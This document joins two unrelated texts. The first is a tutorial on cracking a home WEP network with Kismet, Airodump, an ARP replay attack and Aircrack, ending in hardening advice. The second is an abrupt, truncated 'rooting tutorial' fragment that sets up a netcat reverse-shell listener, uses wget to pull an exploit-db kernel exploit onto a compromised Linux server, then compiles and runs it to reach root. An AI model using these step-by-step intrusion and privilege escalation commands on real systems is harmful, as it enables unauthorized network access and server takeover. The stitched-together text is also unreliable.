To fully utilize WPA, a user would need an 802.1x authentication server, which small businesses and typical home users simply cannot afford. WPA utilizes a 48 bit Initialization Vector (IV), twice the size of WEP, which combined with other WEP fixes, allows substantially greater security over WEP.
Packets and IVs
It’s all in the packets. The bottom line is – while you may be able to employ several security features on your WLAN – anything you broadcast over the air can be intercepted, and could be used to compromise the security on your network. If that frightens you, start stringing wires throughout your home.
Every encrypted packet contains a 24 or 48 bit IV, depending on the type of encryption used. Since the pre-shared key is static and could be easily obtained, the purpose of the IV is to encrypt each packet with a different key. For example, to avoid a duplicate encryption key in every packet sent, the IV is constantly changing. The IV must be known to the client that received the encrypted packet in order to decrypt it; therefore, it is sent in plaintext.
The problem with this method is that the Initialization Vectors are not always the same. In theory, if every IV was different, it would be nearly impossible to obtain the network key; this is not the case. WEP comes with a 24 bit IV; therefore, giving the encryption 16 million unique values that can be used. This may sound like a large number, but when it comes to busy network traffic, it’s not.
Every IV is not different; and this is where the issues arise. Network hackers know that all the keys used to encrypt packets are related by a known IV (since the user entered WEP part of the key is rarely changed); therefore, the only change in the key is 24 HFR. Since the IV is randomly chosen, there is a 50% probability that the same IV will repeat after just 5,000 packets; this is known as a collision.
If a hacker knows the content of one packet, he can use the collision to view the contents of the other packet. If enough packets are collected with IV matches, your network’s security can be compromised.
The Setup
My wireless network was powered by a Linksys WRT54G v6 wireless router; It is well known that this model is the most widely used wireless router. Out of the box, the Linksys router came with 1 CD which was nothing more than a visual step by step, what you should do to connect it.
A few things concern me with this router. There was no part in the setup that allowed me, or even told me to change my router’s default password. To change the password, I had to go into the router’s web-based setup utility; this was accessible via the IP address 192.168.1.1 in my Internet browser. The default username and password was admin. If someone was able to compromise the security on my network, they could have easily done this for me; and locked me out of my own network. Sure, I could have performed a hard reset on the router, but I’d have little luck without the Internet or any documentation to help.
If you’re looking to find your default username and password, there is quite a comprehensive list located at http://www.phenoelit.de My advice is to change this immediately, for it may save you some trouble down the road.
Being my first time, I decided to go easy; I set my router up with a basic WEP 64 encryption; it required a 10 digit hex key. I entered the key into the 2 other computers in my home, and I was ready to start.
Hardware
Out of everything I’ve experienced over the last couple weeks, this was the hardest obstacle, by far. I started with a Dell Latitude C610 notebook with a Linksys WPC54GS Wireless-G notebook adapter (Broadcom chipset) running Windows XP Pro; looking back, it was a bad choice.
When selecting hardware, be warned, not all network cards are the equal. It turns out that nearly 99% of the software used to crack network keys are not compatible with notebook cards that have a Broadcom chipset; the ones that were just didn’t work.
9 out of every 10 articles I read boasted the Orinoco Gold PCMCIA network card by Lucent was the absolute best pick and most compatible will all the good software. A trip to E-Bay, $30 later, and I was ready.
The software we will be using is strictly dependent on the chipset of the WNIC, and unfortunately, the operating system. Your best approach would be to research what software you will be using, and then find a card based on the chipset the software is compatible with.
There are many types of chipsets; too many, in fact, to mention. Linux-wlan.org has an unbelievably comprehensive list of WNICs and their corresponding chipset.
All the best programs are made for Linux; windows is certainly a drag when it comes to WLAN penetrating software, but if you don’t have Linux, don’t be too concerned.
It may be in your best interest to invest in a wireless card that has an external antenna jack. The Orinoco Gold WNIC I purchased has one, but since I’m compromising my own network in a short range, it won’t be necessary.
The Software
There are hundreds of applications you can use to do a variety of things with wireless networks. The largest list of software, that I came across, can be found at Wardrive.net. The term “wardriving” is more commonly used for this practice, and involves driving around neighborhoods to look for wireless networks. I refuse to use this term because that is not what I am doing; I am sitting in my home testing the vulnerabilities of my own network.
Let it be known, that it is not illegal to use software to detect the presence of wireless networks; however, if you crack the network and start “stealing” bandwidth, you could be in a world of trouble. Especially if you’re in Singapore.
Once I received my Orinoco card, I began re-installing software which did not previously work with my Linksys card. It was a nightmare; Windows XP kept getting in the way, software that had been moded to run on windows required daunting tasks for installation, some programs simply didn’t work, some required special run time modules to be installed.
After nearly 48 hours of time-wasting, aggravating, disappointment; I came across the answer. A small penguin shone a beam of light upon my browser and blessed me; I found Auditor.
(2/6/07 - The link is currently not working, but you can obtain Auditor through any Torrent service.)
Auditor Security Collection is a self booting Linux-based CD that comes pre-loaded with all the best security software for auditing a system. It comes in a .ISO file that can be downloaded from remote-exploit.org; the ISO image file is roughly 649 Mb, and can be burned to a CD or DVD using most CD/DVD writing utilities.
It was truly amazing; a simple check in the Bios of the laptop to set the boot order to CD/DVD first, a slip of the Auditor CD, and a press of the power button was all it took. I was ready. Be not afraid of this Linux-based CD; everything is laid out on a GUI and all commands have “shortcuts” linking to them on a desktop similar to a windows environment.
Auditor Security Collection does not touch a single file on your hard drive. All files used and saved in the ASC are stored in your notebook’s RAM; once you remove the CD and reboot, everything is exactly as it was.
Detecting my wireless network
If you’ve come this far, believe me, you’re doing well. The first step is to find the network you want to penetrate. As there are a variety of apps that allow you to do this, we will be focusing in on the 2 most popular: Netstumbler, and Kismet.
Netstumber - is a widely popular tool used for detecting 802.11a/b/g wireless networks. The latest version is Netstumbler 0.4.0, and will run in Windows XP. For compatible hardware and requirements, you can check the read me on the Netstumbler forums; or you could just try it. I’d like to point out that many sources have said the Linksys WPC54G/S WNIC does not work with Netstumbler; however, I have been able to make it work by launching the program, then removing and re-inserting the WNIC. The Orinoco Gold works fine with Netstumbler.
Kismet – does a little more than just detecting networks. Aside from providing every detail about a network except the encryption key, Kismet is a packet sniffer and intrusion detection system; we’ll get into sniffing packets a little later.
For this demonstration, we’ll be using the pre-loaded Kismet on the Auditor Security Collection. After inserting and booting the Auditor CD, I was ready to make sure everything was working properly.
From this point, the first thing that needed to be done was to ensure the wireless card was recognized by Auditor; to do this, you will have to venture into the dark world of the command prompt. In Auditor, the command prompt can be reached by clicking on the little black monitor icon located at the bottom of your screen.
Simply typing in iwconfig will allow you to see all the wireless extensions configured on the machine. If you see a screen full of data next to a WLAN0 or ETH0, you’re ready to continue to the next step; otherwise, you will see a list of “no wireless extensions” messages.
Next, you will need to start the Kismet program. You’ll initially be prompted to enter a destination to save data to; you can just select the ’desktop’ and continue. When Kismet loads, you will see a black screen with green text showing all the wireless networks within you signal range.
Kismet will give you all the information you need to start cracking. Pressing ’s’ on your keyboard will bring up a ”Sort Network” dialogue box. From there you can press any of the desired sorting methods. This step is important as it allows you to select a particular wireless network on a list to view more details. Select your network with the arrow keys and press enter.
You will then be looking at nearly all your network details such as name, ssid, server IP, bssid, etc… Most are not relevant in this case, but you should write down a few things:
BSSID
Channel #
Encryption method
Pressing ‘x’ in Kismet will return you to the previous screen. re-select your target WLAN; then press ‘SHFT+C’ to bring up a list of associated clients to the Access Point. Write down the MAC address of all clients as it will prove useful.
Capturing packets
While you may have not been aware, at this point, Kismet has also been capturing packets. This is the bread and butter of cracking any wireless encryption; without data to process you have nothing.
Capturing packets, also known as packet sniffing, is the process of intercepting and logging traffic passing over a network. As information is sent and received over your wireless network, the software captures every packet to allow you to analyze and decode it.
Capturing network traffic can be a timely process; especially if it is a slow network. With no-one on any computers in my home, I generally capture around 3,000 packets within 5 minutes; with users on the other 2 computers, this number is substantially greater. Don’t get confused, it’s not the packet itself that we want; but rather the IVs in the packets.
The programs we will be using to sniff packets are Kismet and Airodump (part of the Aircrack Suite). We’ve already touched Kismet, so lets take a look at Airodump.
Before running Airodump, you must configure your wireless interface to go into ’monitor’ mode; the methods to achieve this require you to go back to the command prompt (konsole).
For most WNICs, you would use the command:
iwconfig mode monitor
And in some instances would have to set the channel number on your WNIC to match that of the target access point:
iwconfig channel #
Note that you will have to replace with the network interface specific to your machine. Using an Orinoco Gold card, my network interface was eth0; but on most machines, it is wlan0 or ath0. So you may have to adjust those commands accordingly. You can find out for sure by simply typing iwconfig.
I should also point out that putting the Orinoco Gold card in ‘monitor’ mode had a different command altogether:
iwpriv eth0 monitor 2 1
Once your in monitor mode, you’re ready to run Airodump. The command used to start Airodump is:
airodump [mac filter]
can be anything you wish; Airodump will put a .cap extension on the end of the name. The mac filter is used to only capture packets from a specific access point. For instance, I used:
airodump eth0 george 00:18:f8:65:fe:41
to capture packets just from my access point - where 00:18:f8:65:fe:41 is the BSSID of the AP.
Airodump looks similar to Kismet, but there are no selectable objects on the screen; it gets right down to it, capturing packets and storing them in the .cap file as defined in the command. You’ll notice Airodump keeps a running count of all the packets captured, and better yet, shows you the number of IVs collected.
The waiting game
The hard truth is that you will need to collect nearly 150,000 IVs to crack a 64 bit WEP key, and around 600,000 IVs to crack a 128 bit WEP key. This number varies, but is mostly dependent on how luck you are. If you watch the IV count in Airodump, you’ll notice that, under normal circumstances, they do not rise rapidly.
This can cause a problem; particularly if you’re as impatient as I am. Let’s take a look at some ways we can speed up this process.
Until now, we’ve been using a method known as a passive attack. A passive attack is basically doing nothing other than passively capturing packets until you have achieved enough data to perform the crack.
Most access points need their client to re-associate after a certain period of time to confirm their connection; therefore, the AP will send out an Address Resolution Protocol (ARP) packet. The ARP packet is unique in that is always addressed to the MAC address FF:FF:FF:FF:FF:FF, usually has a size of 68 bytes, and has the ToDS flag set.
We can use this information to implement an ARP replay attack. For this method, we will be using Aireplay (part of the Aircrack Suite). Aireplay can be used to actually re-send packets that it has received.
Leave Airodump running, and open a new command window. The command we’ll be using for Aireplay is:
aireplay -i -m 68 -n 68 -d ff:ff:ff:ff:ff:ff -b 00:18:f8:65:fe:41 eth0
The -i tells Aireplay to capture packets on the fly; the -m 68 and -n 68 tells aireplay that you only want it to replay packets that are 68 bytes. The -d and -b are the destination MAC address and AP MAC Address(BSSID) respectively. This is the criteria that is defined for our ARP packet, which is usually associated with an IV.
Alternatively, you may have already captured one of these packets. You can have Aireplay check the .cap file from Airodump with the -f switch:
aireplay -f george.cap -m 68 -n 68 -d ff:ff:ff:ff:ff:ff -b 00:18:f8:65:fe:41 eth0
In either case, If Aireplay finds a match to our specifications, it will show you the details of the packet and ask if you would like to replay it. If the details look exactly as shown below, press ‘y’ for yes.
FromDS = 0, ToDS = 1
BSSID =
Src. MAC =
Dst. MAC = ff:ff:ff:ff:ff:ff
Aireplay will then begin to replay the packet; if you’ve found a winning packet, you will notice your packet and IV count in Airodump rise extremely quick. If not, only the packet count in Airodump will rise; If this be the case, press CTRL+C to abort the operation, restart aireplay, and try again.
It has been noted that some routers will detect this erratic behavior and block the MAC address of the WNIC you are using. Adding a -x switch followed by a “replay per second #” will slow down the rate at which Airplay replays these packets.
If your lucky enough, you will have collected enough IVs in little time. For me, it took 28 minutes including booting up, writing down the network specs, and typing all those lengthy commands.
There are other methods such as Dueth attacks which force the clients off the AP, causing them to have to re-associate; but these methods require a second computer.
The crack
Two of the most popular programs used for actually cracking the WEP key are Airsnort and Aircrack. Airsnort can be used with the .dump files that Kismet provides; and Aircrack can be used with the .cap files that Airodump provides.
Airsnort can be used on it’s own without any other software capturing packets; although, it has been reported to be extremely unstable in this state, and you should probably not chance loosing all your captured data. A better method would be to let Airsnort recover the encryption key from your Kismet .dump file. Kismet and Airsnort can run simultaneously.
For this demonstration, we’ll be using Aircrack. You can use Airodump to capture the packets, and Aircrack to crack the encryption key at the same time.
With Airodump running, open a new command window and type:
aircrack -f 3 -n 64 -q 3 george.cap
The -f switch followed by a number is the fudgefactor; which is a variable that the program uses to define how thoroughly it scans the .cap file. A larger number will give you a better chance of finding the key, but will usually take longer. The default is 2.
The -n switch followed by 64 represents that you are trying to crack a WEP 64 key. I knew because it was a setup; In the real world there is no way to determine what WEP key length a target access point is using. You may have to try both 64 and 128.
The -q 3 switch was used to display the progress of the software. It can be left out altogether to provide a faster crack; although, if you’ve obtained enough unique IVs, you should not be waiting more than a couple minutes.
A -m switch can be used, followed by a MAC address, to filter a specific AP’s usable packets; this would come in handy if you were collecting packets from multiple APs in Airodump.
Aircrack recovered my WEP 64 key within 1 minute using 76,000 unique IVs; the whole process took around 34 minutes.
The same experiment was repeated with WEP 128 and it took about 43 minutes. The reason it was not substantially longer is because I simply let Airplay replay more packets. Sometimes you can get lucky and capture an ARP Request packet within a few minutes; otherwise, it could take a couple hours.
After I had access to the network, many doors opened up. Aside from having access to the Internet, I was able to use Networkview – a network discovery tool – to obtain my network’s workgroup name. From there, I had access to all the shared files on my drives.
While I’m no expert in the subject, I can at least assume that many horrible things could happen if the wrong hands were to obtain my WLAN encryption key.
The conclusion
Always use WPA or WPA2 encryption when possible. If your using WPA with a pre-shared key, use a strong password; hackers can use dictionary attacks, and they will be quite effective if you have an easy password. You may want to use a strong password generator like the one at grc.com.
If your access point supports it, you may want to consider disabling wireless SSID broadcast; however, this may raise some issues with the APs clients recognizing it. (Kismet will still recognize it)
Many routers will allow you to filter what clients can access the network; this is known as Wireless MAC Filtering. If you know the MAC address of the clients you are using, you can enter them into your configuration utility as “Permit ONLY”. This is not a 100% effective method; MAC addresses can be cloned to match the AP’s associated clients, but it does provide you with a slightly higher level of security. (there is a utility on Auditor to allow you to do this)
By default, your router may be set to mixed mode; this allows 802.11b and 802.11g devices to access your network. If you use only 802.11g devices, set your router to G-ONLY. Had my router been set this way, I would have never been able to do any of this. The Orinoco Gold card is 802.11b, and is obviously not compatible with a 802.11g network. Many 802.11g cards are not supported by the software we’ve used in this tutorial, but few are. While your at it, please change your default router username and password.
While I haven’t tried my hand at cracking a WPA encryption, the methods are similar when the WLANs use pre-shared keys (psk); I do plan on trying it, and I will surely write an update to let you know how/if it was done.
By no means am I claiming to be an expert in this field; If you’ve noticed anything that was incorrect or just have something to add, please feel free to drop a comment.     

Rooting Tutorial

1- Your IP Address.
2-The port you forwarded.

Now, go on CMD and type in:cd 'Path To Your Netcat.exe' and then you need to make netcat listen to the port you forwarded.To do this, type:nc -l -n -v -p port

It looked like this for me:

Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.

C:\FeAR>cd C:\

C:\>cd WINDOWS

C:\WINDOWS>nc -l -n -v -p 4444
listening on [any] 4444 ...

Now, when you have netcat listening to the port you forwarded, click 'Connect'.

When your connected, type 'whoami'.You shouldnt have root.

Now, to find an exploit to root the box, you need to know whats the kernel version.To do this, just type 'uname -a'.

It should look something like this:

Code:
Linux linux1.dmehosting.com 2.6.17-92.1.10.el5PAE #1 SMP Tue Aug 5 08:14:05 EDT 2008 i686


Now, we go on exploit-db.com and we will look for '2.6.17'.

Code:
hhttp://www.exploit-db.com/exploits/5092/


Now, we type 'wget http://www.exploit-db.com/exploits/5092/ on the netcat window.

Code:
wget http://xpl_url.com


So the exploit works, you must compile it in the server(gcc) and execute it via exploit(-o).

To do this we type 'gcc 5092 -o exploit'.

Code:
gcc 5092 -o exploit


5092- After the url path.http://www.site.com/5092.
exploit- Output name.


Now you can execute your exploit by typing './exploit'

Wait for the exploit to finish running and type root again.

It should output in something like this:

Code:
uid=0(root) gid=0(root) groups=500(apache)


This means you have successfully rooted the box Smile.

There are more ways to do this, this is the way I usually do it.